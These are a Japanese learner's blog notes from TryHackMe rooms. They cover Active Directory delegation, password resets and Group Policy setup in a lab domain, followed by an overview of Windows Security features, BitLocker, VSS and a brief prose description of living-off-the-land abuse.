保護が外れているので削除確認画面が表示される。

2.委任
シナリオ：ITサポート担当者の「Phillip」に「Sales」、「Marketing」、「Management」のパスワードリセット権限を付与する。
※今回は「Sales」のみ実演。

2-1. 「制御の委任(Delegate Control)」から「Phillip」にパスワードリセット権限を付与する。

 OUを右クリックして制御の委任(Delegate Control)。

「Add」→「Phillip」と入力して「名前の確認(Check Names)」をクリック→OK→Next

「ユーザーのパスワードをリセットし、次回ログオン時にパスワード変更を強制する(Reset user passwords and force password change at next logon)」にチェックを入れ、Next。

2-2. 「Phillip」でログインし、Sales 部門のユーザー「Sophie」のパスワードリセットを実行する。

まずは、「Phillip」でログイン。

xfreerdp3 /v:IPアドレス /u:'THM¥ユーザー名' /p:'パスワード'

PowerShell からパスワード変更。
※7文字以上、大文字・小文字・数字・記号を混ぜたパスワード推奨。簡単すぎるとエラーになる。

PS C:\Users\phillip> Set-ADAccountPassword sophie -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose

New Password: **********

VERBOSE: Performing the operation "Set-ADAccountPassword" on target "CN=Sophie,OU=Sales,OU=THM,DC=thm,DC=local".

一緒にパスワードの強制リセットも設定。次回ログイン時にパスワード変更が必須になる。

PS C:\Users\phillip> Set-ADUser -ChangePasswordAtLogon $true -Identity sophie -Verbose

VERBOSE: Performing the operation "Set" on target "CN=Sophie,OU=Sales,OU=THM,DC=thm,DC=local".

2-3.「Sophie」でログインし、フラグを取得。

まずは、「Sophie」でRDPログイン。

xfreerdp3 /v:IPアドレス /u:'THM¥ユーザー名' /p:'パスワード'

パスワードの強制リセットが反映されている。任意のパスワードを設定し、ログイン。

デスクトップにフラグを発見。

Task5 実演

1.コンピューターの移動
シナリオ：デフォルトでDCを除くすべてのマシンは「Computers」コンテナに配置される。最適なOUを作成し、各マシンを配置しなおす。

1-1.まずは「Workstations」と「Servers」OUを作成。

1-2.次に適切なOUにマシンを移動。

Task6 実演

1.コントロールパネルへのアクセス制限
シナリオ：コントロールパネルへのアクセスをIT部門のユーザーのみに制限したい。

1-1.GPO「Restrict Control Panel Access」を作成。

Group Policy Management → 「Group Policy Objects」を右クリック → New

「Restrict Control Panel Access」→ OK

1-2.「Restrict Control Panel Access」ポリシーを編集。

「Restrict Control Panel Access」を右クリック → Edit

User Configuration → Policies → Administrative Templates → Control Panel に移動。
「Prohibit access to Control Panel and PC settings」 を Enabled（有効） にする。

1-3.「Restrict Control Panel Access」をリンク。

Marketing、Management、Sales に「Restrict Control Panel Access」をドラック＆ドロップ。

2.すべてのマシンに自動ロックを適用する
シナリオ：すべてのマシンに5 分間のアイドルで自動ロックの設定をする。

2-1.GPO「Auto Lock Screen」を作成。

Group Policy Management → 「Group Policy Objects」を右クリック → New → Auto Lock Screen → OK

2-2.「Auto Lock Screen」ポリシーを編集。

Computer Configuration → Policies → Windows Settings → Security Settings → Local Policies → Security Options → Interactive logon: Machine inactivity limit → 値を 5 分（＝300 秒） に設定し、OK。

2-3.「Auto Lock Screen」をリンク。

thm.local（ルートドメイン）に「Auto Lock Screen」をドラック＆ドロップ。

3.GPOが適用されているか確認。

まずは、「Mark」でRDPログイン。

xfreerdp3 /v:IPアドレス /u:'THM¥ユーザー名' /p:'パスワード'

gpupdate /force でポリシーを即時適用。

コントロールパネルを開こうとするとエラーになる。

後は、5分放置して画面が自動ロックになるか確認して終了。

つまづいたこと

グループとOUの違い

グループもOUも同じもののように見えた。
例えば、営業部のAさんがいたとして
グループ：営業
OU：営業
権限：営業
となると、OUとグループの役割が重複しているのでは？と思った。
ChatGPTに聞いてみた結果

• Aさんのアカウント → OU「営業」に所属
  • → 営業部用のポリシー（例：USB禁止、壁紙設定など）が自動適用
• Aさんのアカウント → グループ「営業」にも所属
  • → 営業フォルダのアクセス権限を持つ

👉 つまり「OUとグループは別の役割を持っていて、重複して使うものではない」んです。

とのこと。自身で調べてみても間違ってはいなさそう。
ざっくり
OU = GPOを適用
グループ = フォルダアクセス権を適用　の違いがあることは覚えた。

はじめに

Windows Fundamentals 3 の備忘録。
本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。

TryHackMe

Windows Fundamentals 3 In part 3 of the Windows Fundamentals module, learn about the built-in Microsoft tools that help keep the device secure, such as Windows Updates, Windows Securi…

Windows Fundamentals 3

Windows Security

旧名称：Windows Defender Security Center
Windowsに最初から入っているセキュリティ機能を一元管理するツール。
ウイルス対策やファイアウォール、デバイス保護などをまとめて確認・設定できる。

主な機能

Virus & threat protection (ウイルスと脅威の防止 )
Windows Defender Antivirus（標準のウイルス対策ソフト）の状態を管理。
スキャン、ウイルス定義の更新、検出ログ確認など。

Firewall & network protection (ファイアウォールとネットワーク保護)
Windows Defender Firewall の管理。
ネットワークごと（ドメイン/プライベート/パブリック）に制御できる。

App & browser control(アプリとブラウザの制御 )
Microsoft Defender SmartScreen の設定。
危険なアプリやフィッシングサイトのブロック。

Device security (デバイスセキュリティ)
ハードウェアレベルの保護（TPM、セキュアブート、仮想化ベースのセキュリティなど）。

マークの意味

Windowsセキュリティの各項目には、状態を示すマークが表示される。

✅ 緑色（チェックマーク）
→ 「問題なし」の状態。正常に動作していて、特に操作は不要。
例：ファイアウォールが有効、アプリ制御がオンになっている場合。

⚠️ 黄色（警告アイコン/感嘆符）
→ 「注意が必要」な状態。
設定が推奨されるが、セキュリティ上、致命的ではない場合に表示。
例：ウイルススキャンがしばらく実行されていない。

❌ 赤色（×マーク）
→ 「危険」や「対処が必要」な状態。
セキュリティ保護が無効になっていたり、脅威が検出された場合に表示。
例：ウイルス対策が無効、マルウェアが検出された。

Windows Security の画面
※Windows Server 2019エディション

Virus & threat protection（ウイルスと脅威からの保護）

Windowsに標準搭載されているウイルス対策機能。
マルウェア（ウイルス、ワーム、トロイの木馬、ランサムウェアなど）からPCを守る。
定期的なスキャンやリアルタイム保護を行い、脅威が見つかると通知してくれる。
サードパーティ製のアンチウイルスソフト（例：Norton、McAfeeなど）を入れると、この項目がそのソフトに切り替わることもある。

主な機能

Current threats（現在の脅威）
PC上に現在存在する脅威を確認する機能。

主な項目
現在の脅威一覧：検出されたマルウェアがあればここに表示される。
スキャン結果：最後にスキャンした日時、スキャンの種類（クイック/フル/カスタム）、検出数、処理結果。
スキャンオプション：
　-クイックスキャン：感染しやすい場所だけ短時間でチェック。
　-フルスキャン：全ファイルやプログラムを調査。時間がかかる。
　-カスタムスキャン：ユーザーが指定したフォルダやドライブを確認。
Threat history（脅威の歴史）：
Last scan（最後のスキャン）
最後に実行したスキャン日時や結果が記録される。
Quarantined threats（隔離された脅威）
検出されたウイルスやマルウェアを「隔離領域」に移動して、PC上で実行されないようにしたもの。
ユーザーはここから削除したり、誤検知であれば「復元」することも可能。
Allowed threats（許可した脅威）
本来は脅威として検出されたが、ユーザーが「安全だ」と判断して実行を許可した項目。
注意：セキュリティ的にはリスクが高いため、100%安全だと確信がある場合のみ許可するべき。

Virus & threat protection settings（ウイルスと脅威の防止設定）
マルウェア対策の細かい挙動を設定できる場所。

主な項目
Real-time protection（リアルタイム保護）：常に動作している監視。オフにすると危険。
Cloud-delivered protection（クラウド提供の保護）：最新の脅威情報をクラウドから取得し、より早く防御。
Automatic sample submission（自動サンプル送信）：怪しいファイルをMicrosoftに送って解析。
Controlled Folder Access（制御されたフォルダアクセス）：特定のフォルダ（例：ドキュメント、ピクチャ、デスクトップなど）を保護領域に指定する機能。
Exclusions（除外設定）：特定のフォルダやファイルをスキャン対象外にする（誤検知対策）。
Notifications（通知）：検出や問題があればユーザーに知らせる。

注意
リアルタイム保護やクラウド保護を切ると感染リスクが大幅に上がる。

Virus & threat protection updates（ウイルスと脅威からの保護の更新）
セキュリティ定義ファイル（ウイルス定義データベース）を最新に保つ。

主な項目
Check for updates（更新確認）ボタンで手動更新可能。
通常は自動更新されるため、最新のウイルスにも対応できる。

ポイント
古い定義のままだと新種のウイルスを検知できないので、更新の有無は非常に重要。

Ransomware protection（ランサムウェア対策）
ランサムウェアによる「ファイル暗号化」からデータを守る。

主な項目
Controlled folder access（制御されたフォルダアクセス）
特定フォルダ（例：ドキュメント、ピクチャ）を守り、未知のアプリが勝手に変更できないようにする。この機能を使うにはリアルタイム保護を有効にしなければいけない。

Firewall & network protection（ファイアウォールとネットワーク保護）

Windowsに標準搭載されているネットワーク保護機能。
ドメイン・プライベート・パブリックといったネットワークごとに通信ルールを制御し、
外部からの不正アクセスや不要なアプリの通信をブロックできる。

主な機能

プロファイル

Domain network
ドメイン参加時に使う社内向けプロファイル。企業ポリシーで管理されることが多い。

Private network（active）
家庭/社内の信頼できるネットワーク。共有や発見を許可する設定が選べる。

Public network
公共Wi-Fi等の不特定多数が利用する環境。最も厳格（受信接続は原則ブロック）。

追加オプション

（Allow an app through firewallアプリをファイアウォール経由で許可する）
特定のアプリやサービスについて、ファイアウォールのブロックを解除し通信を許可する設定。
例えば、ゲームやリモートデスクトップ、開発用のWebサーバーなどを動かすときに必要。

Network and Internet troubleshooter（ネットワークとインターネットのトラブルシューティング）
ネットワーク接続の問題（Wi-Fiにつながらない、通信が不安定など）を自動診断・修復するツール。
ファイアウォール設定が原因で通信できない場合にも役立つ。

Firewall notification settings（ファイアウォール通知の設定）
新しいアプリが通信をしようとしたときに、通知を表示するかどうかを設定できる。
通常はオンにしておくのがおすすめ。安全でないアプリの通信を防ぐ手がかりになる。

Advanced settings（詳細設定）
Windows Defender Firewall with Advanced Security の画面を開く。
送信ルールや受信ルールを細かく設定可能。ポート番号・プロトコル・アプリ単位で制御できる。
企業ネットワークやサーバー管理で使われることが多い。

Restore firewalls to default（ファイアウォールを既定に戻す）
ファイアウォールの設定をすべてリセットして、初期状態に戻す。
設定を間違えて通信できなくなった場合などのトラブル解決に有効。

App & browser control（アプリとブラウザのコントロール）

主に Microsoft Defender SmartScreen という仕組みを利用して、危険なWebサイトやアプリからPCを保護する。
信頼できないファイルや不審なWebコンテンツを検出し、ユーザーに警告を出す。

主な機能

Check apps and files（アプリとファイルの確認）
Windows Defender SmartScreen が、インターネットや外部から入ってくる未知または信頼されていないアプリ・ファイルをチェックして、危険なものの実行を防ぐ。

Block（ブロック）
不審なアプリやファイルを検出した場合、実行自体をブロックする。安全性が高い設定。
Warn（警告）
実行前に警告を表示。ユーザーが「続行」を選べば実行できる。利便性と安全性のバランス。
Off（無効）
チェックを行わない。セキュリティ的にリスクが高いため推奨されない。

Exploit protection（エクスプロイト防止）
Windows10以降に標準搭載されている、脆弱性を悪用した攻撃（エクスプロイト）からPCを守る仕組み。
メモリ破壊系の攻撃や不正コード実行など、一般的なエクスプロイト手法を困難にする。

Device security（デバイスセキュリティ）

ハードウェアレベルの保護機能（TPM、Secure Boot、仮想化ベースのセキュリティなど）の状態を表示。
この設定を変更することは稀。

BitLocker（ディスク暗号化機能）

正式名称：BitLocker Drive Encryption
目的：PCのハードディスクやSSD全体を暗号化して、不正アクセスからデータを保護する。
仕組み：AES（Advanced Encryption Standard）という強力な暗号化方式を使い、ディスク上のデータを「読み取り不可能な状態」にする。

特徴

PCを盗まれても安心
HDDやSSDを取り外して別のPCにつないでも、中身は暗号化されているため読み取れない。

OSごと暗号化
ディスク全体を暗号化するため、ファイル単位ではなく「PCそのもののセキュリティ」を高められる。

TPMチップ連携
Trusted Platform Module（TPM：信頼できるプラットフォームモジュール）¹と連携し、起動時にハードウェアの改ざんを検出できる。

回復キー
パスワードを忘れた場合やPCに大きな変更があった場合は、セットアップ時に生成される「回復キー」で復旧可能。

1. パソコンに搭載されているセキュリティ専用チップのこと。暗号鍵や証明書などの重要情報を安全に保存するための領域を持つ。PCの金庫役。 ↩︎

Volume Shadow Copy Service / VSS（ボリューム・シャドウ・コピー・サービス）

ファイルやシステムを使用中（稼働中）の状態でも、一時的なスナップショット（シャドウコピー） を作成できる。
そのスナップショットを利用して、バックアップや復元を行うことが可能。
例えば、システムの「復元ポイント」や、バックアップソフトが動作中に使っている。

主な役割

ファイルを開いたままでもバックアップ可能
→ 通常は編集中のファイルをコピーできないが、VSSがスナップショットを作ることで可能になる。

システム復元に利用
→ Windowsの「復元ポイント」もVSSによって管理されている。

アプリやサービスと連携
→ SQL Server や Exchange などのデータベースも VSS を利用して一貫性のあるバックアップを実現できる。

セキュリティや注意点

ランサムウェア攻撃では、復元できなくするためにこのVSSのスナップショットが削除されることが多い。
そのため、VSSは便利だが完全なバックアップ手段ではなく、外部媒体へのバックアップも重要。

Living Off The Land / LotL（環境寄生型攻撃）

攻撃者がOSや標準ツール（既に存在する正当なバイナリ/機能）を悪用してマルウェアを配布・持続化・横展開・情報窃取などを行う手法。
これまでに紹介したWindowsの標準機能も、LotL攻撃で悪用されることがある。

具体例

PowerShellを使ってDefenderの設定を無効化する。
netshコマンドを使ってFirewallルールを改変する。
VSSを削除してバックアップを無効化する。
BitLockerを悪用して強制暗号化し、利用者がデータにアクセスできなくする。
など